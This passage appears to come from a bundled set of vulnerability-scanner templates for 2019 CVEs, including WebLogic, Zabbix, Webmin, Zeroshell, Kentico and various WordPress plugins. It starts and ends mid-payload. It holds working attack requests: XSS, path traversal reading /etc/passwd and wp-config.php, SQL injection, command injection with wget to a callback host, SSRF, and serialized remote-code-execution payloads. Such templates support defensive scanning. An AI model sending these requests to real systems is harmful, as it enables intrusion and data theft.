index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"threads":50,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2